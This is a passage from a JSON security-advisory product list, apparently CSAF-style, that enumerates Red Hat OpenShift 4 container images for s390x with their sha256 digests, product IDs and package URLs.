"product_id": "registry.redhat.io/openshift4/ose-cluster-machine-approver-rhel9@sha256:c5093213a910684e94394a0bb9f931c2b62dce522bf1926e0dbf17220d166d3a_s390x",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-cluster-machine-approver-rhel9@sha256%3Ac5093213a910684e94394a0bb9f931c2b62dce522bf1926e0dbf17220d166d3a?arch=s390x\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775557261"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-cluster-olm-rhel9-operator@sha256:0df81a471b525e99a5084cd3fdd23a75f9df9f1916944e877c264f35bce94b8f_s390x",
"product": {
"name": "registry.redhat.io/openshift4/ose-cluster-olm-rhel9-operator@sha256:0df81a471b525e99a5084cd3fdd23a75f9df9f1916944e877c264f35bce94b8f_s390x",
"product_id": "registry.redhat.io/openshift4/ose-cluster-olm-rhel9-operator@sha256:0df81a471b525e99a5084cd3fdd23a75f9df9f1916944e877c264f35bce94b8f_s390x",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-cluster-olm-rhel9-operator@sha256%3A0df81a471b525e99a5084cd3fdd23a75f9df9f1916944e877c264f35bce94b8f?arch=s390x\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775605218"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-cluster-openshift-apiserver-rhel9-operator@sha256:089ee476ddc1e24bcd421536afea9b800bab93bf4ad5f507109b84b6520b5126_s390x",
"product": {
"name": "registry.redhat.io/openshift4/ose-cluster-openshift-apiserver-rhel9-operator@sha256:089ee476ddc1e24bcd421536afea9b800bab93bf4ad5f507109b84b6520b5126_s390x",
"product_id": "registry.redhat.io/openshift4/ose-cluster-openshift-apiserver-rhel9-operator@sha256:089ee476ddc1e24bcd421536afea9b800bab93bf4ad5f507109b84b6520b5126_s390x",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-cluster-openshift-apiserver-rhel9-operator@sha256%3A089ee476ddc1e24bcd421536afea9b800bab93bf4ad5f507109b84b6520b5126?arch=s390x\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775606091"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-cluster-openshift-controller-manager-rhel9-operator@sha256:c28a0834626b38f25a88ee742e048c395c260065658ae4480f702a21b42cfcf6_s390x",
"product": {
"name": "registry.redhat.io/openshift4/ose-cluster-openshift-controller-manager-rhel9-operator@sha256:c28a0834626b38f25a88ee742e048c395c260065658ae4480f702a21b42cfcf6_s390x",
"product_id": "registry.redhat.io/openshift4/ose-cluster-openshift-controller-manager-rhel9-operator@sha256:c28a0834626b38f25a88ee742e048c395c260065658ae4480f702a21b42cfcf6_s390x",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-cluster-openshift-controller-manager-rhel9-operator@sha256%3Ac28a0834626b38f25a88ee742e048c395c260065658ae4480f702a21b42cfcf6?arch=s390x\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775572197"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ovirt-csi-driver-rhel9-operator@sha256:dcffbfba5a93e392e08fb0d010fd9b75694c4411016d09852fc51239d5234e9d_s390x",
"product": {
"name": "registry.redhat.io/openshift4/ovirt-csi-driver-rhel9-operator@sha256:dcffbfba5a93e392e08fb0d010fd9b75694c4411016d09852fc51239d5234e9d_s390x",
"product_id": "registry.redhat.io/openshift4/ovirt-csi-driver-rhel9-operator@sha256:dcffbfba5a93e392e08fb0d010fd9b75694c4411016d09852fc51239d5234e9d_s390x",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ovirt-csi-driver-rhel9-operator@sha256%3Adcffbfba5a93e392e08fb0d010fd9b75694c4411016d09852fc51239d5234e9d?arch=s390x\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775604638"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-cluster-samples-rhel9-operator@sha256:0c0a7de41476c5ebe5774b6cb3534894f3cc995d369299defa385e525da08084_s390x",
"product": {
"name": "registry.redhat.io/openshift4/ose-cluster-samples-rhel9-operator@sha256:0c0a7de41476c5ebe5774b6cb3534894f3cc995d369299defa385e525da08084_s390x",
"product_id": "registry.redhat.io/openshift4/ose-cluster-samples-rhel9-operator@sha256:0c0a7de41476c5ebe5774b6cb3534894f3cc995d369299defa385e525da08084_s390x",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-cluster-samples-rhel9-operator@sha256%3A0c0a7de41476c5ebe5774b6cb3534894f3cc995d369299defa385e525da08084?arch=s390x\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775606091"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-cluster-update-keys-rhel9@sha256:0d05cfa770dfd10491cb290afaf8498cbe5235a61781fedd7c5284060d9a7e34_s390x",
"product": {
"name": "registry.redhat.io/openshift4/ose-cluster-update-keys-rhel9@sha256:0d05cfa770dfd10491cb290afaf8498cbe5235a61781fedd7c5284060d9a7e34_s390x",
"product_id": "registry.redhat.io/openshift4/ose-cluster-update-keys-rhel9@sha256:0d05cfa770dfd10491cb290afaf8498cbe5235a61781fedd7c5284060d9a7e34_s390x",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-cluster-update-keys-rhel9@sha256%3A0d05cfa770dfd10491cb290afaf8498cbe5235a61781fedd7c5284060d9a7e34?arch=s390x\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775604407"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-container-networking-plugins-rhel9@sha256:176ac0dff111c759bee1251925874b63b60c5f42fbefae44c6518928abf7f58b_s390x",
"product": {
"name": "registry.redhat.io/openshift4/ose-container-networking-plugins-rhel9@sha256:176ac0dff111c759bee1251925874b63b60c5f42fbefae44c6518928abf7f58b_s390x",
"product_id": "registry.redhat.io/openshift4/ose-container-networking-plugins-rhel9@sha256:176ac0dff111c759bee1251925874b63b60c5f42fbefae44c6518928abf7f58b_s390x",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-container-networking-plugins-rhel9@sha256%3A176ac0dff111c759bee1251925874b63b60c5f42fbefae44c6518928abf7f58b?arch=s390x\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775605056"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-csi-external-resizer-rhel9@sha256:5f47a5d1025b8499572c93c4fbd1c8596e8afb2291a3408db77bb0d475b179a6_s390x",
"product": {
"name": "registry.redhat.io/openshift4/ose-csi-external-resizer-rhel9@sha256:5f47a5d1025b8499572c93c4fbd1c8596e8afb2291a3408db77bb0d475b179a6_s390x",
"product_id": "registry.redhat.io/openshift4/ose-csi-external-resizer-rhel9@sha256:5f47a5d1025b8499572c93c4fbd1c8596e8afb2291a3408db77bb0d475b179a6_s390x",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-csi-external-resizer-rhel9@sha256%3A5f47a5d1025b8499572c93c4fbd1c8596e8afb2291a3408db77bb0d475b179a6?arch=s390x\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775564121"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-csi-external-snapshotter-rhel9@sha256:15fa093433263f5b73be4d59d0bbadaa6f0201f0d8bb0e72ed4187db8ebd4ecd_s390x",
"product": {
"name": "registry.redhat.io/openshift4/ose-csi-external-snapshotter-rhel9@sha256:15fa093433263f5b73be4d59d0bbadaa6f0201f0d8bb0e72ed4187db8ebd4ecd_s390x",
"product_id": "registry.redhat.io/openshift4/ose-csi-external-snapshotter-rhel9@sha256:15fa093433263f5b73be4d59d0bbadaa6f0201f0d8bb0e72ed4187db8ebd4ecd_s390x",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-csi-external-snapshotter-rhel9@sha256%3A15fa093433263f5b73be4d59d0bbadaa6f0201f0d8bb0e72ed4187db8ebd4ecd?arch=s390x\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775563469"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-csi-snapshot-controller-rhel9@sha256:9979f3eec067571040422a0ad1b96b993a415bf2743960292df2a95b279ca695_s390x",
"product": {
"name": "registry.redhat.io/openshift4/ose-csi-snapshot-controller-rhel9@sha256:9979f3eec067571040422a0ad1b96b993a415bf2743960292df2a95b279ca695_s390x",
"product_id": "registry.redhat.io/openshift4/ose-csi-snapshot-controller-rhel9@sha256:9979f3eec067571040422a0ad1b96b993a415bf2743960292df2a95b279ca695_s390x",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-csi-snapshot-controller-rhel9@sha256%3A9979f3eec067571040422a0ad1b96b993a415bf2743960292df2a95b279ca695?arch=s390x\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775564451"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-etcd-rhel9@sha256:640febb01fbe420ea03dcf3cc19bb8d0c9cf26c4af953133d51347baef830441_s390x",
"product": {
"name": "registry.redhat.io/openshift4/ose-etcd-rhel9@sha256:640febb01fbe420ea03dcf3cc19bb8d0c9cf26c4af953133d51347baef830441_s390x",
"product_id": "registry.redhat.io/openshift4/ose-etcd-rhel9@sha256:640febb01fbe420ea03dcf3cc19bb8d0c9cf26c4af953133d51347baef830441_s390x",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-etcd-rhel9@sha256%3A640febb01fbe420ea03dcf3cc19bb8d0c9cf26c4af953133d51347baef830441?arch=s390x\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775573039"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/frr-rhel9@sha256:47fd82ed75709dd28b0f9f2eab2a051e3bedac64d2fa11dc93a8a8a7159e287b_s390x",
"product": {
"name": "registry.redhat.io/openshift4/frr-rhel9@sha256:47fd82ed75709dd28b0f9f2eab2a051e3bedac64d2fa11dc93a8a8a7159e287b_s390x",
"product_id": "registry.redhat.io/openshift4/frr-rhel9@sha256:47fd82ed75709dd28b0f9f2eab2a051e3bedac64d2fa11dc93a8a8a7159e287b_s390x",
"product_identification_helper": {
"purl": "pkg:oci/openshift/frr-rhel9@sha256%3A47fd82ed75709dd28b0f9f2eab2a051e3bedac64d2fa11dc93a8a8a7159e287b?arch=s390x\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775602311"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-ibm-cloud-controller-manager-rhel9@sha256:b692a262776393fe214b1f5e16690098f0ba9c52da91ef168d67915bd4d915b6_s390x",
"product": {
"name": "registry.redhat.io/openshift4/ose-ibm-cloud-controller-manager-rhel9@sha256:b692a262776393fe214b1f5e16690098f0ba9c52da91ef168d67915bd4d915b6_s390x",
"product_id": "registry.redhat.io/openshift4/ose-ibm-cloud-controller-manager-rhel9@sha256:b692a262776393fe214b1f5e16690098f0ba9c52da91ef168d67915bd4d915b6_s390x",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-ibm-cloud-controller-manager-rhel9@sha256%3Ab692a262776393fe214b1f5e16690098f0ba9c52da91ef168d67915bd4d915b6?arch=s390x\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775561999"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-ibm-vpc-block-csi-driver-rhel9@sha256:36145ed08ac5a3071011ff44e0411e3ded8d3483cf59d296c4795043f13f8e10_s390x",
"product": {
"name": "registry.redhat.io/openshift4/ose-ibm-vpc-block-csi-driver-rhel9@sha256:36145ed08ac5a3071011ff44e0411e3ded8d3483cf59d296c4795043f13f8e10_s390x",
"product_id": "registry.redhat.io/openshift4/ose-ibm-vpc-block-csi-driver-rhel9@sha256:36145ed08ac5a3071011ff44e0411e3ded8d3483cf59d296c4795043f13f8e10_s390x",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-ibm-vpc-block-csi-driver-rhel9@sha256%3A36145ed08ac5a3071011ff44e0411e3ded8d3483cf59d296c4795043f13f8e10?arch=s390x\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775557304"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-ibm-vpc-block-csi-driver-rhel9-operator@sha256:0eec1806c1aebb18c929da840845a8acff65ddc2066d343f2d02b3dd080954e1_s390x",
"product": {
"name": "registry.redhat.io/openshift4/ose-ibm-vpc-block-csi-driver-rhel9-operator@sha256:0eec1806c1aebb18c929da840845a8acff65ddc2066d343f2d02b3dd080954e1_s390x",
"product_id": "registry.redhat.io/openshift4/ose-ibm-vpc-block-csi-driver-rhel9-operator@sha256:0eec1806c1aebb18c929da840845a8acff65ddc2066d343f2d02b3dd080954e1_s390x",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-ibm-vpc-block-csi-driver-rhel9-operator@sha256%3A0eec1806c1aebb18c929da840845a8acff65ddc2066d343f2d02b3dd080954e1?arch=s390x\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775566494"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-ibmcloud-cluster-api-controllers-rhel9@sha256:e0ca3155faa73128c74048ce8082773be395f0072b87d01b9f4cd973f48d5486_s390x",
"product": {
"name": "registry.redhat.io/openshift4/ose-ibmcloud-cluster-api-controllers-rhel9@sha256:e0ca3155faa73128c74048ce8082773be395f0072b87d01b9f4cd973f48d5486_s390x",
"product_id": "registry.redhat.io/openshift4/ose-ibmcloud-cluster-api-controllers-rhel9@sha256:e0ca3155faa73128c74048ce8082773be395f0072b87d01b9f4cd973f48d5486_s390x",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-ibmcloud-cluster-api-controllers-rhel9@sha256%3Ae0ca3155faa73128c74048ce8082773be395f0072b87d01b9f4cd973f48d5486?arch=s390x\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775572733"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-ibmcloud-machine-controllers-rhel9@sha256:bf3fa8833ab188a275570bc9f3e58dc4f174015221c3d7aa388468b38b2aec5c_s390x",
"product": {
"name": "registry.redhat.io/openshift4/ose-ibmcloud-machine-controllers-rhel9@sha256:bf3fa8833ab188a275570bc9f3e58dc4f174015221c3d7aa388468b38b2aec5c_s390x",
"product_id": "registry.redhat.io/openshift4/ose-ibmcloud-machine-controllers-rhel9@sha256:bf3fa8833ab188a275570bc9f3e58dc4f174015221c3d7aa388468b38b2aec5c_s390x",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-ibmcloud-machine-controllers-rhel9@sha256%3Abf3fa8833ab188a275570bc9f3e58dc4f174015221c3d7aa388468b38b2aec5c?arch=s390x\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775566505"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-insights-rhel9-operator@sha256:c5227faf255e647c6444c423132e4de3562ac3279a17a2665be03d4e6bba9750_s390x",
"product": {
"name": "registry.redhat.io/openshift4/ose-insights-rhel9-operator@sha256:c5227faf255e647c6444c423132e4de3562ac3279a17a2665be03d4e6bba9750_s390x",
"product_id": "registry.redhat.io/openshift4/ose-insights-rhel9-operator@sha256:c5227faf255e647c6444c423132e4de3562ac3279a17a2665be03d4e6bba9750_s390x",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-insights-rhel9-operator@sha256%3Ac5227faf255e647c6444c423132e4de3562ac3279a17a2665be03d4e6bba9750?arch=s390x\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775573055"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/insights-runtime-exporter-rhel9@sha256:8f7e2a8735cb9b09639c5a467b8656bd7dd1bd4f72bc50164f0e4623ffacd93c_s390x",
"product": {
"name": "registry.redhat.io/openshift4/insights-runtime-exporter-rhel9@sha256:8f7e2a8735cb9b09639c5a467b8656bd7dd1bd4f72bc50164f0e4623ffacd93c_s390x",
"product_id": "registry.redhat.io/openshift4/insights-runtime-exporter-rhel9@sha256:8f7e2a8735cb9b09639c5a467b8656bd7dd1bd4f72bc50164f0e4623ffacd93c_s390x",
"product_identification_helper": {
"purl": "pkg:oci/openshift/insights-runtime-exporter-rhel9@sha256%3A8f7e2a8735cb9b09639c5a467b8656bd7dd1bd4f72bc50164f0e4623ffacd93c?arch=s390x\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775605722"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/insights-runtime-extractor-rhel9@sha256:17333d63845becea642ecb6fd8f76e7a4d698f8a661a981b59e9c920d1973d46_s390x",
"product": {
"name": "registry.redhat.io/openshift4/insights-runtime-extractor-rhel9@sha256:17333d63845becea642ecb6fd8f76e7a4d698f8a661a981b59e9c920d1973d46_s390x",
"product_id": "registry.redhat.io/openshift4/insights-runtime-extractor-rhel9@sha256:17333d63845becea642ecb6fd8f76e7a4d698f8a661a981b59e9c920d1973d46_s390x",
"product_identification_helper": {
"purl": "pkg:oci/openshift/insights-runtime-extractor-rhel9@sha256%3A17333d63845becea642ecb6fd8f76e7a4d698f8a661a981b59e9c920d1973d46?arch=s390x\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775565133"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-installer-rhel9@sha256:10bda9f9f7f635c444b59e1d0db17776fe52ce9a3e39aba1d0ad339cde9dfcd3_s390x",
"product": {
"name": "registry.redhat.io/openshift4/ose-installer-rhel9@sha256:10bda9f9f7f635c444b59e1d0db17776fe52ce9a3e39aba1d0ad339cde9dfcd3_s390x",
"product_id": "registry.redhat.io/openshift4/ose-installer-rhel9@sha256:10bda9f9f7f635c444b59e1d0db17776fe52ce9a3e39aba1d0ad339cde9dfcd3_s390x",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-installer-rhel9@sha256%3A10bda9f9f7f635c444b59e1d0db17776fe52ce9a3e39aba1d0ad339cde9dfcd3?arch=s390x\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775612266"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-installer-artifacts-rhel9@sha256:60bf3d574a9289b95a0d999a8e653df107ee3fa888bf367436aee7417ceaf3c4_s390x",
"product": {
"name": "registry.redhat.io/openshift4/ose-installer-artifacts-rhel9@sha256:60bf3d574a9289b95a0d999a8e653df107ee3fa888bf367436aee7417ceaf3c4_s390x",
"product_id": "registry.redhat.io/openshift4/ose-installer-artifacts-rhel9@sha256:60bf3d574a9289b95a0d999a8e653df107ee3fa888bf367436aee7417ceaf3c4_s390x",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-installer-artifacts-rhel9@sha256%3A60bf3d574a9289b95a0d999a8e653df107ee3fa888bf367436aee7417ceaf3c4?arch=s390x\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775612304"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/kube-metrics-server-rhel9@sha256:4892cd8581f10f3338980a4bc69f02d8379e54fc0f4c4d11af27baec253ea11a_s390x",
"product": {
"name": "registry.redhat.io/openshift4/kube-metrics-server-rhel9@sha256:4892cd8581f10f3338980a4bc69f02d8379e54fc0f4c4d11af27baec253ea11a_s390x",
"product_id": "registry.redhat.io/openshift4/kube-metrics-server-rhel9@sha256:4892cd8581f10f3338980a4bc69f02d8379e54fc0f4c4d11af27baec253ea11a_s390x",
"product_identification_helper": {
"purl": "pkg:oci/openshift/kube-metrics-server-rhel9@sha256%3A4892cd8581f10f3338980a4bc69f02d8379e54fc0f4c4d11af27baec253ea11a?arch=s390x\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775605620"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-kube-storage-version-migrator-rhel9@sha256:b77f9bbb2cff61a07a2a3ef19b3b06245a1aef3537c1bae47a349906983865ea_s390x",
"product": {
"name": "registry.redhat.io/openshift4/ose-kube-storage-version-migrator-rhel9@sha256:b77f9bbb2cff61a07a2a3ef19b3b06245a1aef3537c1bae47a349906983865ea_s390x",
"product_id": "registry.redhat.io/openshift4/ose-kube-storage-version-migrator-rhel9@sha256:b77f9bbb2cff61a07a2a3ef19b3b06245a1aef3537c1bae47a349906983865ea_s390x",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-kube-storage-version-migrator-rhel9@sha256%3Ab77f9bbb2cff61a07a2a3ef19b3b06245a1aef3537c1bae47a349906983865ea?arch=s390x\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775604115"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-kubevirt-cloud-controller-manager-rhel9@sha256:805c6881556aebde1af449f5fd8c2fd61e02a8e661890a13c17860c618953abe_s390x",
"product": {
"name": "registry.redhat.io/openshift4/ose-kubevirt-cloud-controller-manager-rhel9@sha256:805c6881556aebde1af449f5fd8c2fd61e02a8e661890a13c17860c618953abe_s390x",
"product_id": "registry.redhat.io/openshift4/ose-kubevirt-cloud-controller-manager-rhel9@sha256:805c6881556aebde1af449f5fd8c2fd61e02a8e661890a13c17860c618953abe_s390x",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-kubevirt-cloud-controller-manager-rhel9@sha256%3A805c6881556aebde1af449f5fd8c2fd61e02a8e661890a13c17860c618953abe?arch=s390x\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775565007"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/kubevirt-csi-driver-rhel9@sha256:01d975619247a08e37e5d9fb38dcbca09555b283991441a4a208da524e4f8c74_s390x",
"product": {
"name": "registry.redhat.io/openshift4/kubevirt-csi-driver-rhel9@sha256:01d975619247a08e37e5d9fb38dcbca09555b283991441a4a208da524e4f8c74_s390x",
"product_id": "registry.redhat.io/openshift4/kubevirt-csi-driver-rhel9@sha256:01d975619247a08e37e5d9fb38dcbca09555b283991441a4a208da524e4f8c74_s390x",
"product_identification_helper": {
"purl": "pkg:oci/openshift/kubevirt-csi-driver-rhel9@sha256%3A01d975619247a08e37e5d9fb38dcbca09555b283991441a4a208da524e4f8c74?arch=s390x\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775604912"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-libvirt-machine-controllers-rhel9@sha256:7a4ce4e7146c846b4450f0f027dd07d3f5e32d40b3bc7e167032eef302c618f5_s390x",
"product": {
"name": "registry.redhat.io/openshift4/ose-libvirt-machine-controllers-rhel9@sha256:7a4ce4e7146c846b4450f0f027dd07d3f5e32d40b3bc7e167032eef302c618f5_s390x",
"product_id": "registry.redhat.io/openshift4/ose-libvirt-machine-controllers-rhel9@sha256:7a4ce4e7146c846b4450f0f027dd07d3f5e32d40b3bc7e167032eef302c618f5_s390x",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-libvirt-machine-controllers-rhel9@sha256%3A7a4ce4e7146c846b4450f0f027dd07d3f5e32d40b3bc7e167032eef302c618f5?arch=s390x\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775604362"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-machine-api-rhel9-operator@sha256:042bf2a1e502809836efca400fc7d7b9e781697611b59cbfd34874a909019518_s390x",
"product": {
"name": "registry.redhat.io/openshift4/ose-machine-api-rhel9-operator@sha256:042bf2a1e502809836efca400fc7d7b9e781697611b59cbfd34874a909019518_s390x",
"product_id": "registry.redhat.io/openshift4/ose-machine-api-rhel9-operator@sha256:042bf2a1e502809836efca400fc7d7b9e781697611b59cbfd34874a909019518_s390x",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-machine-api-rhel9-operator@sha256%3A042bf2a1e502809836efca400fc7d7b9e781697611b59cbfd34874a909019518?arch=s390x\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775607009"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-machine-api-provider-openstack-rhel9@sha256:81bf0b5564a44be0cee22fce23cf7237fc2db06ad8c67bc81673d9bdc8f82a18_s390x",
"product": {
"name": "registry.redhat.io/openshift4/ose-machine-api-provider-openstack-rhel9@sha256:81bf0b5564a44be0cee22fce23cf7237fc2db06ad8c67bc81673d9bdc8f82a18_s390x",
"product_id": "registry.redhat.io/openshift4/ose-machine-api-provider-openstack-rhel9@sha256:81bf0b5564a44be0cee22fce23cf7237fc2db06ad8c67bc81673d9bdc8f82a18_s390x",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-machine-api-provider-openstack-rhel9@sha256%3A81bf0b5564a44be0cee22fce23cf7237fc2db06ad8c67bc81673d9bdc8f82a18?arch=s390x\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775564642"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-machine-config-rhel9-operator@sha256:542fd2652f1cd2f47478979e1ba39295889a54cc28e6f6a642554ad4c5cc93cb_s390x",
"product": {
"name": "registry.redhat.io/openshift4/ose-machine-config-rhel9-operator@sha256:542fd2652f1cd2f47478979e1ba39295889a54cc28e6f6a642554ad4c5cc93cb_s390x",
"product_id": "registry.redhat.io/openshift4/ose-machine-config-rhel9-operator@sha256:542fd2652f1cd2f47478979e1ba39295889a54cc28e6f6a642554ad4c5cc93cb_s390x",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-machine-config-rhel9-operator@sha256%3A542fd2652f1cd2f47478979e1ba39295889a54cc28e6f6a642554ad4c5cc93cb?arch=s390x\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775604341"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-machine-os-images-rhel9@sha256:32bcdfbd738620ad414cad2ebb45abd3beeae96c7ae6f06c403441d22ecc4abb_s390x",
"product": {
"name": "registry.redhat.io/openshift4/ose-machine-os-images-rhel9@sha256:32bcdfbd738620ad414cad2ebb45abd3beeae96c7ae6f06c403441d22ecc4abb_s390x",
"product_id": "registry.redhat.io/openshift4/ose-machine-os-images-rhel9@sha256:32bcdfbd738620ad414cad2ebb45abd3beeae96c7ae6f06c403441d22ecc4abb_s390x",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-machine-os-images-rhel9@sha256%3A32bcdfbd738620ad414cad2ebb45abd3beeae96c7ae6f06c403441d22ecc4abb?arch=s390x\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775619097"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-multus-admission-controller-rhel9@sha256:b91171b9f56b994aa3bf574862cedd318db66039a1cdfb08798ee1700c0f956a_s390x",
"product": {
"name": "registry.redhat.io/openshift4/ose-multus-admission-controller-rhel9@sha256:b91171b9f56b994aa3bf574862cedd318db66039a1cdfb08798ee1700c0f956a_s390x",
"product_id": "registry.redhat.io/openshift4/ose-multus-admission-controller-rhel9@sha256:b91171b9f56b994aa3bf574862cedd318db66039a1cdfb08798ee1700c0f956a_s390x",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-multus-admission-controller-rhel9@sha256%3Ab91171b9f56b994aa3bf574862cedd318db66039a1cdfb08798ee1700c0f956a?arch=s390x\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775604704"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-multus-route-override-cni-rhel9@sha256:4c6d93338edf2c6e6633a530fcec5519e33b51c1c0e07558402d3aa52ef5c925_s390x",
"product": {
"name": "registry.redhat.io/openshift4/ose-multus-route-override-cni-rhel9@sha256:4c6d93338edf2c6e6633a530fcec5519e33b51c1c0e07558402d3aa52ef5c925_s390x",
"product_id": "registry.redhat.io/openshift4/ose-multus-route-override-cni-rhel9@sha256:4c6d93338edf2c6e6633a530fcec5519e33b51c1c0e07558402d3aa52ef5c925_s390x",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-multus-route-override-cni-rhel9@sha256%3A4c6d93338edf2c6e6633a530fcec5519e33b51c1c0e07558402d3aa52ef5c925?arch=s390x\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775605900"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-multus-whereabouts-ipam-cni-rhel9@sha256:5b46c8f78db81e2da8ae6ab8bb08319ea90ef4cdc815c0aa87c45a706a4cfc0f_s390x",
"product": {
"name": "registry.redhat.io/openshift4/ose-multus-whereabouts-ipam-cni-rhel9@sha256:5b46c8f78db81e2da8ae6ab8bb08319ea90ef4cdc815c0aa87c45a706a4cfc0f_s390x",
"product_id": "registry.redhat.io/openshift4/ose-multus-whereabouts-ipam-cni-rhel9@sha256:5b46c8f78db81e2da8ae6ab8bb08319ea90ef4cdc815c0aa87c45a706a4cfc0f_s390x",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-multus-whereabouts-ipam-cni-rhel9@sha256%3A5b46c8f78db81e2da8ae6ab8bb08319ea90ef4cdc815c0aa87c45a706a4cfc0f?arch=s390x\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775605545"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-must-gather-rhel9@sha256:85a930f0612b1fa7d455550a04666b723bb4402fec82481abf505a3f7c791526_s390x",
"product": {
"name": "registry.redhat.io/openshift4/ose-must-gather-rhel9@sha256:85a930f0612b1fa7d455550a04666b723bb4402fec82481abf505a3f7c791526_s390x",
"product_id": "registry.redhat.io/openshift4/ose-must-gather-rhel9@sha256:85a930f0612b1fa7d455550a04666b723bb4402fec82481abf505a3f7c791526_s390x",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-must-gather-rhel9@sha256%3A85a930f0612b1fa7d455550a04666b723bb4402fec82481abf505a3f7c791526?arch=s390x\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775564698"
}
}
},
{
